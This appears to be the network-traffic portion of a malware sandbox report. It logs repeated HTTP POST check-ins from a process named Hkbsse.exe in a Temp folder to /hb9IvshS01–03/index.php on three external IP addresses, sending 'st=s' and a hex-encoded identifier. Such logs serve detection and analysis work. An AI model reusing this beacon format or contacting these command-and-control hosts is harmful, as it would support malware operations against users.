Aug 27, 2024 14:19:59.521035910 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.6	52283	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:59.051647902 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.6	52285	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:59.582159042 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.6	52284	89.23.103.42	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:59.582217932 CEST	314	OUT	POST /hb9IvshS02/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 89.23.103.42 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.6	52286	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:59.692112923 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:00.508378029 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:00.511049986 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:00.765825987 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.6	52287	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:00.879472971 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:01.612624884 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:01.705044985 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:01.957629919 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.6	52288	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:01.336134911 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.6	52290	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:02.067568064 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:02.917001963 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:02.918260098 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:03.154135942 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.6	52291	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:02.928744078 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.6	52292	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:03.270104885 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.6	52293	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:03.582772970 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:04.262486935 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.6	52294	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:03.691550016 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.6	52295	89.23.103.42	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:03.694185972 CEST	156	OUT	POST /hb9IvshS02/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 89.23.103.42 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.6	52296	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:04.405602932 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:05.101758003 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:05.102478981 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:05.340173960 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.6	52297	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:05.287870884 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.6	52298	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:05.457453966 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:06.152915955 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:06.154002905 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:06.394316912 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.6	52299	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:06.506691933 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:07.210591078 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:07.437971115 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.6	52300	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:07.041486025 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.6	52301	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:08.634192944 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.6	52302	89.23.103.42	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:08.634469032 CEST	314	OUT	POST /hb9IvshS02/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 89.23.103.42 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.6	52303	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:08.634571075 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:09.559272051 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:09.560367107 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:09.805321932 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
